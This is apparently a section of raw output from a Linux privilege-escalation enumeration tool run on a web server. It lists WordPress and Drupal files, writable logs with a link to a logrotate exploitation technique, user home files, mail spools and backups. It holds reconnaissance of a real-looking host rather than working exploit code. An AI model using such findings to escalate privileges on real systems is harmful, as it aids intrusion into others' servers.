2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/jquery-ui/ui-icons_777777_256x240.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/jquery-ui/ui-icons_777620_256x240.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/jquery-ui/ui-icons_555555_256x240.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/header-image-1200x400.jpg
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/featured4.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/featured3.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/featured2.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/content-none.php
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/comments.php
2023-11-26+12:26:12.4045796200 /srv/web/sitelabo/wp-content/themes/clean-education/images/no-thumb-600x400.jpg
2023-11-26+12:26:12.4045796200 /srv/web/sitelabo/wp-content/themes/clean-education/images/jquery-ui/ui-icons_444444_256x240.png
2023-11-26+12:26:12.4005795900 /srv/web/sitelabo/wp-content/themes/clean-education/images/featured1.png
2023-11-26+12:26:12.4005795900 /srv/web/sitelabo/wp-content/themes/clean-education/functions.php
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/widgets.css
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/jquery.sidr.light.css
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/jquery.sidr.dark.css
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/genericons/genericons.css
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/genericons/Genericons.woff
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/genericons/Genericons.ttf
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/genericons/Genericons.svg
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/genericons/Genericons.eot
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/css/blocks.css
2023-11-26+12:26:12.3965795590 /srv/web/sitelabo/wp-content/themes/clean-education/archive.php
2023-11-26+12:26:12.3925795270 /srv/web/sitelabo/wp-content/themes/clean-education/css/jquery.sidr.light.min.css
2023-11-26+12:26:12.3925795270 /srv/web/sitelabo/wp-content/themes/clean-education/css/jquery.sidr.dark.min.css
2023-11-26+12:26:12.3925795270 /srv/web/sitelabo/wp-content/themes/clean-education/css/editor-blocks.css
2023-11-26+12:26:12.3925795270 /srv/web/sitelabo/wp-content/themes/clean-education/css/colors/dark.css
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/sidebar-footer.php
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/rtl.css
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/no-results.php
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/skip-link-focus-fix.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/jquery.cycle/jquery.cycle2.tile.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/jquery.cycle/jquery.cycle2.scrollVert.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/jquery.cycle/jquery.cycle2.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/jquery.cycle/jquery.cycle2.flip.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/jquery.cycle/jquery.cycle2.carousel.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/html5.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/navigation.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/jquery.cycle/jquery.cycle2.tile.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/jquery.cycle/jquery.cycle2.scrollVert.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/jquery.cycle/jquery.cycle2.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/jquery.cycle/jquery.cycle2.flip.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/jquery.cycle/jquery.cycle2.carousel.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/fitvids.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/customizer.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/customizer-custom-scripts.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/js/custom-scripts.min.js
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/css/jquery-ui.css
2023-11-26+12:26:12.3885794960 /srv/web/sitelabo/wp-content/themes/clean-education/css/editor-style.css
2023-11-26+12:26:12.3805794350 /srv/web/sitelabo/wp-content/themes/clean-education/style.css-old
2023-11-26+12:26:12.3805794350 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/scrollup.js
2023-11-26+12:26:12.3805794350 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/navigation.js
2023-11-26+12:26:12.3805794350 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/fitvids.js
2023-11-26+12:26:12.3805794350 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/customizer.js
2023-11-26+12:26:12.3805794350 /srv/web/sitelabo/wp-content/themes/clean-education/js/source/customizer-custom-scripts.js

╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x  3 root     root     4096 Feb 13  2023 .
drwxr-xr-x 22 root     root     4096 Feb 12 12:28 ..
drwxr-xr-x 13 www-data www-data 4096 Feb 13  2023 phpMyAdmin

╔══════════╣ Unexpected in root

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/auth.log
/var/log/syslog
/var/log/journal/4124b057cf524e55826501df39e34beb/system.journal
/var/log/daemon.log
/var/log/btmp
/srv/web/leve-drup/x.txt

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.18.0

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes

╔══════════╣ Files inside /home/www-data (limit 20)

╔══════════╣ Files inside others home (limit 20)
/home/fdmingcri/.profile
/home/fdmingcri/.bashrc
/home/fdmingcri/.bash_logout
/home/fdmingcri/clean-education/inc/news-ticker.php
/home/fdmingcri/clean-education/inc/menus.php
/home/fdmingcri/clean-education/inc/customizer-includes/header-options.php
/home/fdmingcri/clean-education/inc/customizer-includes/news-ticker.php
/home/fdmingcri/clean-education/inc/customizer-includes/theme-options.php
/home/fdmingcri/clean-education/inc/customizer-includes/hero-content.php
/home/fdmingcri/clean-education/inc/customizer-includes/customizer.php
/home/fdmingcri/clean-education/inc/customizer-includes/featured-content.php
/home/fdmingcri/clean-education/inc/customizer-includes/custom-controls.php
/home/fdmingcri/clean-education/inc/customizer-includes/upgrade-button/section-pro.php
/home/fdmingcri/clean-education/inc/customizer-includes/upgrade-button/class-customize.php
/home/fdmingcri/clean-education/inc/customizer-includes/upgrade-button/customize-controls.css
/home/fdmingcri/clean-education/inc/customizer-includes/upgrade-button/customize-controls.js
/home/fdmingcri/clean-education/inc/customizer-includes/sanitize-functions.php
/home/fdmingcri/clean-education/inc/customizer-includes/social-icons.php
/home/fdmingcri/clean-education/inc/customizer-includes/promotion-headline.php
/home/fdmingcri/clean-education/inc/customizer-includes/news.php

╔══════════╣ Searching installed mail applications
postfix
postfix-add-filter
postfix-add-policy
sendmail

╔══════════╣ Mails (limit 50)
   528686     36 -rw-------   1 www-data mail        32980 Dec  1 13:16 /var/mail/www-data
   528686     36 -rw-------   1 www-data mail        32980 Dec  1 13:16 /var/spool/mail/www-data

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 7867 Jul 16  1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 194817 Oct  9  2020 /usr/share/doc/x11-common/changelog.Debian.old.gz
-rw-r--r-- 1 root root 416107 Dec 21  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 351 Jul 23  2023 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rwxr-xr-x 1 root root 52256 Jul 23  2023 /usr/bin/wsrep_sst_mariabackup
-rwxr-xr-x 1 root root 3025 Jul 23  2023 /usr/bin/wsrep_sst_backup
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rw-r--r-- 1 root root 0 Dec 15  2022 /home/daoud/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lrza/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lrza/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lobem/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 daoud daoud 0 Oct 11  2022 /home/daoud/lobem/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lrza9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lrza9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 28  2023 /srv/web/leve9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 28  2023 /srv/web/leve9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.2/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-10.0.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbcm-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbcm-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Feb 12  2023 /srv/web/drupal-9.4.10/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 root root 0 Feb 19  2023 /srv/web/leve-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 root root 0 Feb 19  2023 /srv/web/leve-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/leve-9-4-8/ldb-9-4-8/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lrza-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lrza-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 19  2023 /srv/web/lrza9-4-10/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 19  2023 /srv/web/lrza9-4-10/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 root root 0 Feb 21  2023 /srv/web/lee26-2-23/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 root root 0 Feb 21  2023 /srv/web/lee26-2-23/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbpo-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxrwxrwx 1 www-data www-data 0 Oct 11  2022 /srv/web/lbpo-9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo-error/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo-error/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lbpo9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 root root 0 Feb 20  2023 /srv/web/leve9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 root root 0 Feb 20  2023 /srv/web/leve9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Mar  2  2023 /srv/web/lee/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 root root 0 Feb 26  2023 /srv/web/lee9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 root root 0 Feb 26  2023 /srv/web/lee9-4-8/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/ldb9-5-0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lrza/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 26  2023 /srv/web/lrza/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Mar  1  2023 /srv/web/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Mar  1  2023 /srv/web/leve/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 www-data www-data 0 Feb 21  2023 /srv/web/lbcm/drupal-9.5.0/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
-rwxr-xr-x 1 root root 0 Feb 26  2023 /srv/web/lobem/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rwxr-xr-x 1 root root 0 Feb 26  2023 /srv/web/lobem/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/aliases.db: Berkeley DB (Hash, version 9, native byte-order)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3034001
Found /var/lib/apt/listchanges.db: Berkeley DB (Hash, version 9, native byte-order)

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)

╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x  3 root root 4.0K Jan 14  2023 .
drwxr-xr-x 12 root root 4.0K Jan 14  2023 ..
drwxr-xr-x  2 root root 4.0K Jan 14  2023 html

/var/www/html:
total 20K
drwxr-xr-x 2 root root 4.0K Jan 14  2023 .
drwxr-xr-x 3 root root 4.0K Jan 14  2023 ..

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-r--r--r-- 1 root root 37 Feb 12 12:28 /dev/.lxc-boot-id
-rw-r--r-- 1 root root 395 Aug  6  2020 /usr/share/doc/libjs-bootstrap4/examples/.stylelintrc
-rw-r--r-- 1 fdmingcri fdmingcri 220 Feb 13  2023 /home/fdmingcri/.bash_logout
-rwxr-xr-x 1 fdmingcri fdmingcri 88 Feb 20  2023 /home/fdmingcri/leve/core/.prettierrc.json
-rwxr-xr-x 1 fdmingcri fdmingcri 413 Feb 20  2023 /home/fdmingcri/leve/core/.eslintrc.passing.json
-rwxr-xr-x 1 fdmingcri fdmingcri 1197 Feb 20  2023 /home/fdmingcri/leve/core/.eslintrc.json
-rwxr-xr-x 1 fdmingcri fdmingcri 13058 Feb 20  2023 /home/fdmingcri/leve/core/.stylelintrc.json
-rwxr-xr-x 1 fdmingcri fdmingcri 1351 Feb 20  2023 /home/fdmingcri/leve/core/.eslintrc.jquery.json
-rwxr-xr-x 1 fdmingcri fdmingcri 373 Feb 20  2023 /home/fdmingcri/leve/core/.stylelintignore
-rwxr-xr-x 1 fdmingcri fdmingcri 642 Feb 20  2023 /home/fdmingcri/leve/core/.eslintignore
-rwxr-xr-x 1 fdmingcri fdmingcri 2103 Feb 20  2023 /home/fdmingcri/leve/core/.cspell.json
-rwxr-xr-x 1 fdmingcri fdmingcri 46 Feb 20  2023 /home/fdmingcri/leve/core/.prettierignore
-rwxr-xr-x 1 fdmingcri fdmingcri 3115 Feb 20  2023 /home/fdmingcri/leve/core/.eslintrc.legacy.json
-rwxr-xr-x 1 fdmingcri fdmingcri 741 Feb 20  2023 /home/fdmingcri/leve/vendor/.htaccess
-rwxr-xr-x 1 fdmingcri fdmingcri 7677 Feb 20  2023 /home/fdmingcri/leve/.htaccess
-rwxr-xr-x 1 fdmingcri fdmingcri 41 Feb 20  2023 /home/fdmingcri/leve/.eslintrc.json
-rwxr-xr-x 1 fdmingcri fdmingcri 151 Feb 20  2023 /home/fdmingcri/leve/.eslintignore
-rwxr-xr-x 1 fdmingcri fdmingcri 1025 Feb 20  2023 /home/fdmingcri/leve/.csslintrc
-rwxr-xr-x 1 fdmingcri fdmingcri 357 Feb 20  2023 /home/fdmingcri/leve/.editorconfig
-rwxr-xr-x 1 fdmingcri fdmingcri 2314 Feb 20  2023 /home/fdmingcri/leve/.ht.router.php
-rw-r--r-- 1 root root 88 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.prettierrc.json
-rw-r--r-- 1 root root 0 Jan 18  2023 /home/daoud/drupal-9.5.2/core/modules/system/tests/fixtures/HtaccessTest/.htaccess
-rw-r--r-- 1 root root 413 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.eslintrc.passing.json
-rw-r--r-- 1 root root 1229 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.eslintrc.json
-rw-r--r-- 1 root root 46 Jan 18  2023 /home/daoud/drupal-9.5.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.htaccess
-rw-r--r-- 1 root root 55 Jan 18  2023 /home/daoud/drupal-9.5.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.eslintrc.json
-rw-r--r-- 1 root root 50 Jan 18  2023 /home/daoud/drupal-9.5.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.eslintignore
-rw-r--r-- 1 root root 47 Jan 18  2023 /home/daoud/drupal-9.5.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.csslintrc
-rw-r--r-- 1 root root 50 Jan 18  2023 /home/daoud/drupal-9.5.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.editorconfig
-rw-r--r-- 1 root root 58 Jan 18  2023 /home/daoud/drupal-9.5.2/core/tests/Drupal/Tests/Composer/Plugin/Scaffold/fixtures/drupal-assets-fixture/assets/.ht.router.php
-rw-r--r-- 1 root root 13133 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.stylelintrc.json
-rw-r--r-- 1 root root 1351 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.eslintrc.jquery.json
-rw-r--r-- 1 root root 373 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.stylelintignore
-rw-r--r-- 1 root root 642 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.eslintignore
-rw-r--r-- 1 root root 2158 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.cspell.json
-rw-r--r-- 1 root root 46 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.prettierignore
-rw-r--r-- 1 root root 49 Jan 18  2023 /home/daoud/drupal-9.5.2/core/scripts/js/.eslintrc.json
-rw-r--r-- 1 root root 3115 Jan 18  2023 /home/daoud/drupal-9.5.2/core/.eslintrc.legacy.json
-rw-r--r-- 1 root root 650 May 31  2022 /home/daoud/drupal-9.5.2/vendor/doctrine/reflection/.doctrine-project.json
-rw-r--r-- 1 root root 795 Dec 27  2022 /home/daoud/drupal-9.5.2/vendor/twig/twig/.php-cs-fixer.dist.php
-rw-r--r-- 1 root root 224 Dec 27  2022 /home/daoud/drupal-9.5.2/vendor/twig/twig/.editorconfig
-r--r--r-- 1 root root 741 Jan 18  2023 /home/daoud/drupal-9.5.2/vendor/.htaccess
-rw-r--r-- 1 root root 136 Apr 30  2019 /home/daoud/drupal-9.5.2/vendor/psr/http-factory/.pullapprove.yml
-rw-r--r-- 1 root root 114 Mar 24  2022 /home/daoud/drupal-9.5.2/vendor/laminas/laminas-feed/.laminas-ci.json
-rw-r--r-- 1 root root 72 Sep  2  2021 /home/daoud/drupal-9.5.2/vendor/laminas/laminas-escaper/.laminas-ci.json
-rw-r--r-- 1 root root 645 Jun 20  2022 /home/daoud/drupal-9.5.2/vendor/guzzlehttp/guzzle/.php_cs
-rw-r--r-- 1 root root 2112 Jun 20  2022 /home/daoud/drupal-9.5.2/vendor/guzzlehttp/psr7/.php_cs.dist
-rw-r--r-- 1 root root 7751 Jan 18  2023 /home/daoud/drupal-9.5.2/.htaccess
-rw-r--r-- 1 root root 41 Jan 18  2023 /home/daoud/drupal-9.5.2/.eslintrc.json
-rw-r--r-- 1 root root 151 Jan 18  2023 /home/daoud/drupal-9.5.2/.eslintignore
-rw-r--r-- 1 root root 1025 Jan 18  2023 /home/daoud/drupal-9.5.2/.csslintrc
-rw-r--r-- 1 root root 357 Jan 18  2023 /home/daoud/drupal-9.5.2/.editorconfig
-rw-r--r-- 1 root root 2314 Jan 18  2023 /home/daoud/drupal-9.5.2/.ht.router.php
-rw-r--r-- 1 root root 88 Jan 18  2023 /home/daoud/drupal-10.0.2/core/.prettierrc.json
